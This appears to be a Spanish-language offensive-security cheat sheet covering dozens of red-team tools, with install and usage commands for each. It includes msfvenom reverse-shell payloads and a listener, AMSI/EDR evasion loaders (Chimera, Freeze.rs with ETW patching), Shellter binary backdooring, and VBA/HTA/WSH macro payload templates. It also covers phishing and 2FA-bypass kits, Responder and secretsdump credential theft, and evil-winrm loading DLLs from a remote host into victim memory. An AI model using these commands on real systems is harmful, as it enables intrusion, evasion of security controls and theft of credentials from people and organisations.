Dismap es una herramienta de descubrimiento e identificación de activos. Puede identificar rápidamente protocolos e información de huellas digitales como web/tcp/udp, localizar tipos de activos, y es adecuada para redes internas y externas.

Dismap cuenta con una base completa de reglas de huellas digitales, que actualmente incluye huellas digitales de protocolos tcp/udp/tls y más de 4500 reglas de huellas digitales web, capaces de identificar favicon, body, header, etc.

Instalación:

Dismap es un archivo binario para Linux, MacOS y Windows. Ve a Release para descargar la versión correspondiente y ejecutar:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Uso:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Imagen utilizada de https://github.com/zhzyker/dismap

🔙enum4linux

Una herramienta para enumerar información de sistemas Windows y Samba.

Se puede usar para recopilar una amplia gama de información, incluyendo:

  • Información del dominio y del controlador de dominio
  • Información de usuarios y grupos locales
  • Recursos compartidos y sus permisos
  • Políticas de seguridad
  • Información de Active Directory

Instalación: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Instalar: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Uso:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
La información completa de uso se puede encontrar en este [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/495/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

_Imagen usada de https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/_

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Escáner de dns/red/puertos peligrosamente rápido, creado por [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), escrito en rust.

Necesitarás un archivo de subdominios. _Ej. [Lista de palabras de subdominios de Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.

**Instalación:**

Descarga la última versión desde [aquí](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Uso:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

_Imagen utilizada de https://github.com/Esc4iCEscEsc/skanuvaty_

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor es una herramienta de inteligencia, cuyo objetivo es realizar tareas OSINT y más, pero sin necesidad de ninguna clave API.

**Características principales:**

- Buscar información sobre direcciones IP, ASN y organizaciones.
- Wrapper para ejecutar rustscan, masscan y nmap de manera más eficiente en IP/CIDR.
- Encontrar más dominios relacionados con el objetivo aplicando diversas técnicas (certificado, whois, Google Analytics, etc.).
- Obtener un resumen sobre la dirección IP (impulsado por [@thebl4ckturtle](https://github.com/theblackturtle))

**Instalación:**```bash
go install github.com/j3ssie/metabigor@latest

Uso:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

_Imagen usada de https://github.com/j3ssie/metabigor_

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob es una herramienta para ayudar a encontrar archivos potencialmente sensibles enviados a repositorios públicos en Github.

Gitrob clonará repositorios pertenecientes a un usuario u organización hasta una profundidad configurable e iterará a través del historial de commits y marcará archivos que coincidan con firmas de archivos potencialmente sensibles.

Los hallazgos se presentarán a través de una interfaz web para una fácil navegación y análisis.

**Nota:** _Gitrob necesitará un token de acceso de Github para interactuar con la API de Github. [Crea un token de acceso personal](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) y guárdalo en una variable de entorno en tu .bashrc o archivo de configuración de shell similar:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Instalar: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Instalar: (Binario)**

Hay una [versión precompilada](https://github.com/michenriksen/gitrob/releases) disponible para cada versión.

**Uso:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Imagen utilizada de https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness es una utilidad de captura de pantalla de sitios web escrita en Golang, que utiliza Chrome Headless para generar capturas de pantalla de interfaces web desde la línea de comandos, con un práctico visor de informes para procesar los resultados. Se admite tanto Linux como macOS, y el soporte para Windows funciona en su mayoría.

Instalación: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
Puede encontrar información completa de instalación [aquí](https://github.com/sensepost/gowitness/wiki/Installation).

**Uso:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

La información completa de uso se encuentra aquí.

imagen

Imagen tomada de https://github.com/sensepost/gowitness

Desarrollo de Recursos

🔙Chimera

Chimera es un script de ofuscación de PowerShell diseñado para evadir AMSI y soluciones antivirus. Procesa archivos PS1 maliciosos conocidos por activar el AV y utiliza sustitución de cadenas y concatenación de variables para eludir las firmas de detección comunes.

Instalación:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**Uso:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom permite la creación de payloads para varios sistemas operativos en una amplia gama de formatos. También admite la ofuscación de payloads para eludir el AV.

Configurar el Listener```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Comandos de Msfvenom

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter es una herramienta dinámica de inyección de shellcode, y el primer infectador PE verdaderamente dinámico jamás creado.

Se puede utilizar para inyectar shellcode en aplicaciones nativas de Windows (actualmente solo aplicaciones de 32 bits).

Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación como cambiar los permisos de acceso a la memoria en las secciones (a menos que el usuario lo desee), agregar una sección adicional con acceso RWE, y cualquier cosa que parecería sospechosa bajo un escaneo de AV.

La información completa del README se puede encontrar aquí.

Instalación: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Instalación: (Windows)**

Visita la [página de descarga](https://www.shellterproject.com/download/) e instala.

**Uso:**

Simplemente elige un binario legítimo para backdoor y ejecuta Shellter.

Algunos buenos consejos se pueden encontrar [aquí](https://www.shellterproject.com/tipstricks/).

Muchas demostraciones de uso de la comunidad se pueden encontrar [aquí](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/495/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

_Imagen utilizada de https://www.kali.org/tools/shellter/images/shellter.png_

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze es una herramienta de creación de payloads utilizada para eludir los controles de seguridad de EDR y ejecutar shellcode de manera sigilosa.

Freeze utiliza múltiples técnicas no solo para eliminar los hooks de Userland de EDR, sino también para ejecutar shellcode de manera que evite otros controles de monitoreo de endpoints.

**Instalación:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Uso:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

_Imagen utilizada de https://www.blackhatethicalhacking.com/tools/freeze/_

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

Este script creará un documento de Microsoft Word con una imagen remota, permitiendo la captura de hashes NTML desde un endpoint víctima remoto.

Microsoft Word tiene la capacidad de incluir imágenes desde ubicaciones remotas, incluyendo una imagen remota alojada en un servidor SMB controlado por el atacante. Esto te brinda la oportunidad de escuchar y capturar los hashes NTLM que se envían cuando una víctima autenticada abre el documento de Word y renderiza la imagen.

**Instalación:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Uso:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

_Imagen usada de https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/_

---

### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)

Si desea obtener más información sobre las técnicas utilizadas en este framework, consulte el blog de SourceZero y la herramienta original.

**Descripción:**

Freeze.rs es una herramienta de creación de payloads utilizada para evadir los controles de seguridad EDR y ejecutar shellcode de manera sigilosa. Freeze.rs utiliza múltiples técnicas no solo para eliminar los hooks de EDR en el espacio de usuario, sino también para ejecutar shellcode de manera que evite otros controles de monitoreo de endpoints.

**Creando un proceso suspendido:**

Cuando se crea un proceso, Ntdll.dll es la primera DLL que se carga; esto ocurre antes de que se cargue cualquier DLL de EDR. Esto significa que hay un pequeño retraso antes de que un EDR pueda cargarse y comenzar a enganchar (hook) y modificar el ensamblado de las DLL del sistema. Al observar las syscalls de Windows en Ntdll.dll, podemos ver que aún no hay nada enganchado. Si creamos un proceso en estado suspendido (uno que está congelado en el tiempo), podemos ver que no se carga ninguna otra DLL, excepto Ntdll.dll. También podemos ver que no hay DLLs de EDR cargadas, lo que significa que las syscalls ubicadas en Ntdll.dll no están modificadas.

![image](https://assets.kitploit.com/production/public/readmes/495/bd6869a0876e06b636a0ab2814e3a2353a4dd7954834e3d79c3b2b44a03c27a4.png)

**Aleatorización del diseño del espacio de direcciones (ASLR)**

Para usar este proceso suspendido limpio y eliminar los hooks del cargador de Freeze.rs, necesitamos una forma de encontrar y leer mediante programación la memoria del proceso suspendido limpio. Aquí es donde entra en juego la aleatorización del diseño del espacio de direcciones (ASLR). ASLR es un mecanismo de seguridad para prevenir vulnerabilidades basadas en la corrupción de la memoria de pila. ASLR aleatoriza el espacio de direcciones dentro de un proceso, para asegurar que todos los objetos mapeados en memoria, la pila, el heap y el propio programa ejecutable, sean únicos. Ahora, aquí es donde se pone interesante porque, si bien ASLR funciona, no lo hace para el código independiente de posición, como las DLL. Lo que sucede con las DLL (específicamente las DLL de sistema conocidas) es que el espacio de direcciones se aleatoriza una vez al arrancar el sistema. Esto significa que no necesitamos enumerar la información de un proceso remoto para encontrar la dirección base de su ntdll.dll, porque es la misma en todos los procesos, incluido el que controlamos. Dado que la dirección de cada DLL es la misma por arranque, podemos obtener esta información de nuestro propio proceso y nunca tener que enumerar el proceso suspendido para encontrar la dirección.

![image](https://assets.kitploit.com/production/public/readmes/495/2e982f594ca0dc518cb32bf3ff1e2803416c699a0fe3f067b1d521276352f53d.png)

Con esta información, podemos usar la API ReadProcessMemory para leer la memoria de un proceso. Esta llamada a la API se asocia comúnmente con la lectura de LSASS como parte de cualquier ataque basado en credenciales; sin embargo, por sí sola no es inherentemente maliciosa, especialmente si solo estamos leyendo una sección arbitraria de memoria. La única vez que ReadProcessMemory será marcada como parte de algo sospechoso es si se está leyendo algo que no se debería (como el contenido de LSASS). Los productos EDR nunca deberían marcar el hecho de que se llamó a ReadProcessMemory, ya que existen usos operativos legítimos para esta función y resultaría en muchos falsos positivos.

Podemos ir un paso más allá leyendo solo una sección de Ntdll.dll donde se almacenan todas las syscalls: su sección .text, en lugar de leer toda la DLL.

Combinando estos elementos, podemos obtener mediante programación una copia de la sección .text de Ntdll.dll para sobrescribir nuestra sección .text existente y con hooks antes de ejecutar el shellcode.

**Parcheo de ETW**

ETW utiliza syscalls incorporadas para generar esta telemetría. Dado que ETW también es una característica nativa integrada en Windows, los productos de seguridad no necesitan "hacer hook" de las syscalls de ETW para acceder a la información. Como resultado, para prevenir ETW, Freeze.rs parchea numerosas syscalls de ETW, vaciando los registros y devolviendo el flujo de ejecución a la siguiente instrucción. El parcheo de ETW ahora es predeterminado en todos los cargadores.

**Shellcode**

![image](https://assets.kitploit.com/production/public/readmes/495/896ef4933a6d5762f9b019a2b557d49af151890f979736ca6c710c856b3d8b94.png)

Con la crate NTAPI de Rust, puedes ver que todas estas llamadas no aparecen en ntdll.dll, sin embargo, todavía existen dentro del proceso.

![image](https://assets.kitploit.com/production/public/readmes/495/8fb4ee66b377c99c51144b36ef80b7f8e795c0197296959ed89161f57838a4c0.png)

Como resultado:

![image](https://assets.kitploit.com/production/public/readmes/495/a8a1bbb194d7e417c9961540376fcb92dc4092b4cbe524cc5c58ce820cb24568.png)

![image](https://assets.kitploit.com/production/public/readmes/495/8a5ddf3aebb2e87f5226d6cde7414adde2d0f4485ddee6aa82170484d8967bd4.png)

**¿Por qué Rust?**

Esto comenzó como un proyecto divertido para aprender Rust y ha crecido hasta convertirse en su propio framework.

**Contribuir**

Freeze.rs fue desarrollado en Rust.

**Instalación**

Si Rust y Rustup no están instalados, por favor instálelos. Si está compilando desde OSX o Linux, asegúrese de tener agregado el objetivo "x86_64-pc-windows-gnu". Para ello, ejecute el siguiente comando:

Una vez hecho, puede compilar Freeze.rs, ejecutar los siguientes comandos o usar el binario compilado:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

Desde allí la versión compilada se encontrará en en target/release (nota si no pones --release el archivo estará en target/debug/ )```bash ___________ _ /_ ____ ____ ________ ____ _______ ______ | ) _ __ _/ __ _/ __ \_ // __ \ _ __ / / | \ | | /\ /\ / / /\ / | | /_
_
/ |
| _
>_
>
___ \___ > /\ |__| /____ > / / / / / / / (@Tyl0us) Soon they will learn that revenge is a dish... best served COLD & Rusty...

USAGE: Freeze-rs [FLAGS] [OPTIONS]

FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information

OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.

root@kitploit:~
**Binario vs DLL**
Freeze.rs puede generar un archivo .exe o .dll. Para especificarlo, asegúrese de que la opción de línea de comandos -O termine con .exe para binarios o .dll para DLL. Actualmente no se admiten otros tipos de archivo. En el caso de archivos DLL, Freeze.rs también puede añadir funcionalidad de exportación adicional. Para ello, use la opción -export con el nombre de la función de exportación específica.

**Cifrado**
Cifrar el shellcode es una técnica importante utilizada para protegerlo de ser detectado y analizado por EDR y otros productos de seguridad. Freeze.rs incluye múltiples métodos para cifrar shellcode, estos incluyen AES, ELZMA y RC4.

**AES**
AES (Advanced Encryption Standard) es un algoritmo de cifrado simétrico que se utiliza ampliamente para cifrar datos. Freeze.rs utiliza un tamaño de bit AES-256 para cifrar el shellcode. La ventaja de usar AES para cifrar shellcode es que proporciona un cifrado fuerte y es ampliamente compatible con las bibliotecas criptográficas. Sin embargo, el uso de un tamaño de bloque fijo puede hacerlo vulnerable a ciertos ataques, como el ataque de oráculo de relleno.

**ELZMA**
ELZMA es un algoritmo de compresión y cifrado que se utiliza a menudo en malware para ofuscar el código. Para cifrar shellcode usando ELZMA, primero se comprime el shellcode usando el algoritmo ELZMA. Luego, los datos comprimidos se cifran utilizando una clave aleatoria. Los datos cifrados y la clave se incrustan luego en el código del exploit. La ventaja de usar ELZMA para cifrar shellcode es que proporciona tanto compresión como cifrado en un solo algoritmo. Esto puede ayudar a reducir el tamaño del código del exploit y hacerlo más difícil de detectar.

**RC4**
RC4 es un algoritmo de cifrado simétrico que se utiliza a menudo en malware para cifrar shellcode. Es un cifrado de flujo que puede utilizar claves de longitud variable y se conoce por su simplicidad y rapidez.

**Consola**
Freeze.rs utiliza una técnica para crear primero el proceso y luego moverlo al fondo. Esto hace dos cosas: primero, ayuda a mantener el proceso oculto, y segundo, evita ser detectado por cualquier producto EDR. Crear un proceso de inmediato en segundo plano puede ser muy sospechoso y un indicador de malicia. Freeze.rs hace esto llamando a las funciones de Windows 'GetConsoleWindow' y 'ShowWindow' después de que se crea el proceso y se cargan los hooks del EDR, y luego cambia los atributos de la ventana a oculta.

Si se selecciona la opción de línea de comandos -console, Freeze.rs no ocultará el proceso en segundo plano. En su lugar, Freeze.rs añadirá varios mensajes de depuración que muestran lo que está haciendo el cargador.

---

### [🔙](#tool-list)WSH

**Creando payload:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Ejecutar:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**Creando payload:**```html
<html>
  <body>
    <script>
      var c = "cmd.exe";
      new ActiveXObject("WScript.Shell").Run(c);
    </script>
  </body>
</html>

Ejecutar: Ejecutar archivo

🔙VBA

Creando payload:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Ejecutar:** Configurar la función para Auto_Open() en documento habilitado para macros

# Acceso Inicial

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

El Bash Bunny es una herramienta de ataque USB física y un sistema de entrega de payloads multifunción. Está diseñado para enchufarse en el puerto USB de una computadora y puede ser programado para realizar una variedad de funciones, incluyendo la manipulación y exfiltración de datos, instalación de malware y evasión de medidas de seguridad.

[hackinglab: Bash Bunny – Guía](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Documentación de Hak5](https://docs.hak5.org/bash-bunny/)

[Repositorio de Payloads](https://github.com/hak5/bashbunny-payloads)

[Página del Producto](https://hak5.org/products/bash-bunny)

![imagen](https://assets.kitploit.com/production/public/readmes/495/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish es un potente framework de phishing de código abierto que facilita probar la exposición de tu organización al phishing. (evilginx2) Framework independiente de ataque man-in-the-middle utilizado para phishing de credenciales de inicio de sesión junto con cookies de sesión, permitiendo la evasión de la autenticación de dos factores

**Instalación:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Uso:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Kit de Ingeniería Social (SET)](https://github.com/IO1337/social-engineering-toolkit)

Este marco es excelente para crear campañas para el acceso inicial, 'SET tiene una serie de vectores de ataque personalizados que te permiten hacer un ataque creíble rápidamente'.

**Instalación:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Uso:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Buena herramienta para ataques de fuerza bruta de inicio de sesión. Puede realizar fuerza bruta en varios servicios, incluidos SSH, FTP, TELNET, HTTP, etc.

**Instalación:**```bash
sudo apt install hydra

Uso:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish es una herramienta de phishing avanzada que utiliza una técnica que combina el flujo de autenticación de código de dispositivo OAuth y códigos QR (consulte [PhishInSuits](https://github.com/secureworks/PhishInSuits) para obtener más información sobre el flujo de código de dispositivo OAuth para ataques de phishing).

Pasos del ataque:

- Enviar código QR malicioso a la víctima
- La víctima escanea el código QR con un dispositivo móvil
- La víctima es dirigida a un servidor controlado por el atacante (iniciando el proceso de flujo de autenticación de código de dispositivo OAuth)
- Se envía un código MFA por correo electrónico a la víctima (iniciando el temporizador de 15 minutos del flujo de código de dispositivo OAuth)
- El atacante consulta la autenticación
- La víctima ingresa el código en el sitio web legítimo de Microsoft
- El atacante guarda el token de autenticación

**Instalación:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Nota: Antes de usar cualquiera de los módulos, actualice la información requerida en el archivo settings.config indicada con Required.

Uso (Módulo de Correo Electrónico):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Uso (Módulo del servidor):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher es una herramienta que permite a los atacantes crear y enviar correos electrónicos de phishing a las víctimas para obtener información sensible.

Incluye funciones como plantillas personalizables, gestión de campañas y capacidades de envío de correos electrónicos, lo que la convierte en una herramienta potente y fácil de usar para llevar a cabo ataques de phishing. Con King Phisher, los atacantes pueden apuntar a individuos u organizaciones con correos electrónicos de phishing convincentes y dirigidos, aumentando las posibilidades de éxito en sus ataques.

Instalación (Linux - Cliente y Servidor):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Uso:**

Una vez que King Phisher haya sido instalado, siga la [página wiki](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) para configurar SSH, la base de datos, el servidor SMTP, etc.

![image](https://assets.kitploit.com/production/public/readmes/495/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

# Ejecución

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder es una herramienta para envenenar los protocolos LLMNR y NBT-NS en una red, para permitir la captura de credenciales y la ejecución de código arbitrario.

Los protocolos LLMNR (Resolución de Nombres Multicast de Enlace Local) y NBT-NS (Servicio de Nombres NetBIOS) son utilizados por los sistemas Windows para resolver nombres de host a direcciones IP en una red local. Si un nombre de host no puede ser resuelto usando estos protocolos, el sistema transmitirá una solicitud de ese nombre de host a la red local.

Responder escucha estas transmisiones y responde con una dirección IP falsa, engañando al sistema solicitante para que envíe sus credenciales al atacante.

**Instalación:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Uso:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
La información completa de uso se puede encontrar [aquí](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/495/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

_Imagen utilizada de https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/_

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Una utilidad que es parte de la biblioteca Impacket que se puede usar para extraer hashes de contraseñas y otros secretos de un sistema Windows.

Lo hace interactuando con la base de datos del Administrador de Cuentas de Seguridad (SAM) en el sistema y extrayendo las contraseñas hasheadas y otra información, como:

- Hashes de contraseñas para cuentas locales
- Tickets y claves de Kerberos
- Secretos de LSA

**Instalación:**```bash
python3 -m pip install impacket

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

_Imagen usada de https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM es una herramienta que proporciona una interfaz de línea de comandos para Windows Remote Management (WinRM: _Un servicio que permite a los administradores ejecutar comandos de forma remota en una máquina Windows_).

Evil-WinRM permite a un atacante conectarse de forma remota a una máquina Windows usando WinRM y ejecutar comandos arbitrarios.

Algunas características incluyen:

- Cargar en memoria scripts de Powershell
- Cargar en memoria archivos dll evadiendo algunos AV
- Cargar payloads x64
- Soporte para Pass-the-hash
- Subir y descargar archivos locales y remotos

**Instalación: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Instalar: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
Las instrucciones de instalación alternativas se pueden encontrar [aquí](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**Uso:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

La documentación completa de uso se puede encontrar aquí.

image

Imagen tomada de https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Una herramienta para la ejecución en memoria de archivos VBScript, JScript, EXE, DLL y ensamblados dotNET. Se puede utilizar para cargar y ejecutar payloads personalizados en sistemas objetivo sin necesidad de dejar archivos en el disco.

Instalación: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
